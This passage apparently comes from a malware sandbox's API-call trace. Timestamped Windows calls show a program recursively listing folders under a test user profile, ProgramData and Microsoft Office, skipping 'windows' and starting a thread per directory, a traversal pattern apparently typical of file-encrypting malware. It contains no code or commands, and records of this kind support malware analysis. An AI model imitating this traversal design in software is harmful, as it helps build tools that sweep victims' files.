[0054.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.626] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.627] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.627] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0054.627] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0054.627] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0054.627] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0054.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*" [0054.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*") returned 68 [0054.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0" [0054.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*" [0054.627] GlobalMemoryStatus (in: lpBuffer=0x27adfd10 | out: lpBuffer=0x27adfd10) [0054.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2512f920, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0054.634] CloseHandle (hObject=0x394) returned 1 [0054.634] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0054.634] FindClose (in: hFindFile=0x671cf0 | out: hFindFile=0x671cf0) returned 1 Thread: id = 846 os_tid = 0x5b4 [0054.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*", lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6717f0 [0054.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.630] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.630] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.630] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0054.630] lstrcmpW (lpString1=".", lpString2="Dictionaries") returned -1 [0054.630] lstrcmpW (lpString1="..", lpString2="Dictionaries") returned -1 [0054.630] lstrcmpiW (lpString1="windows", lpString2="Dictionaries") returned 1 [0054.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*" [0054.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*") returned 72 [0054.633] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\", lpString2="Dictionaries" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries" [0054.633] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*" [0054.633] GlobalMemoryStatus (in: lpBuffer=0x27c1fd10 | out: lpBuffer=0x27c1fd10) [0054.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a828630, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x478 [0054.637] CloseHandle (hObject=0x478) returned 1 [0054.637] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0054.637] FindClose (in: hFindFile=0x6717f0 | out: hFindFile=0x6717f0) returned 1 Thread: id = 847 os_tid = 0x520 [0054.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*", lpFindFileData=0x27d5fd30 | out: lpFindFileData=0x27d5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc598 [0058.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.878] FindNextFileW (in: hFindFile=0x10fbc598, lpFindFileData=0x27d5fd30 | out: lpFindFileData=0x27d5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.878] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.878] FindNextFileW (in: hFindFile=0x10fbc598, lpFindFileData=0x27d5fd30 | out: lpFindFileData=0x27d5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.879] FindClose (in: hFindFile=0x10fbc598 | out: hFindFile=0x10fbc598) returned 1 Thread: id = 848 os_tid = 0x958 [0054.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*", lpFindFileData=0x27e9fd30 | out: lpFindFileData=0x27e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0059.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.243] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x27e9fd30 | out: lpFindFileData=0x27e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.243] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.243] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x27e9fd30 | out: lpFindFileData=0x27e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0059.243] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0059.243] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0059.243] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0059.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" [0059.243] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned 71 [0059.243] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0059.243] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*" [0059.243] GlobalMemoryStatus (in: lpBuffer=0x27e9fd10 | out: lpBuffer=0x27e9fd10) [0059.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24590ff8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.245] CloseHandle (hObject=0x5f0) returned 1 [0059.245] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x27e9fd30 | out: lpFindFileData=0x27e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0059.245] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 849 os_tid = 0x130 [0054.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*", lpFindFileData=0x27fdfd30 | out: lpFindFileData=0x27fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ef0 [0059.251] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.251] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x27fdfd30 | out: lpFindFileData=0x27fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.251] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.251] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x27fdfd30 | out: lpFindFileData=0x27fdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.251] FindClose (in: hFindFile=0x5e2ef0 | out: hFindFile=0x5e2ef0) returned 1 Thread: id = 850 os_tid = 0x8a8 [0054.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*", lpFindFileData=0x2811fd30 | out: lpFindFileData=0x2811fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0059.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.242] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2811fd30 | out: lpFindFileData=0x2811fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.242] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.242] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2811fd30 | out: lpFindFileData=0x2811fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.242] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 851 os_tid = 0x85c [0054.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*", lpFindFileData=0x2825fd30 | out: lpFindFileData=0x2825fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671330 [0059.241] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.241] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2825fd30 | out: lpFindFileData=0x2825fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.241] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.241] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.241] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2825fd30 | out: lpFindFileData=0x2825fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.241] FindClose (in: hFindFile=0x671330 | out: hFindFile=0x671330) returned 1 Thread: id = 852 os_tid = 0x9bc [0054.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*", lpFindFileData=0x2839fd30 | out: lpFindFileData=0x2839fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558928 [0061.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.620] FindNextFileW (in: hFindFile=0x24558928, lpFindFileData=0x2839fd30 | out: lpFindFileData=0x2839fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.756] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.756] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.756] FindNextFileW (in: hFindFile=0x24558928, lpFindFileData=0x2839fd30 | out: lpFindFileData=0x2839fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0062.756] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0062.756] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0062.756] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 Thread: id = 853 os_tid = 0x920 [0054.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*", lpFindFileData=0x284dfd30 | out: lpFindFileData=0x284dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc658 [0059.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.247] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x284dfd30 | out: lpFindFileData=0x284dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.247] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x284dfd30 | out: lpFindFileData=0x284dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.247] FindClose (in: hFindFile=0x10fbc658 | out: hFindFile=0x10fbc658) returned 1 Thread: id = 854 os_tid = 0xbf4 [0054.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*", lpFindFileData=0x2861fd30 | out: lpFindFileData=0x2861fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8190 [0055.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.684] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x2861fd30 | out: lpFindFileData=0x2861fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 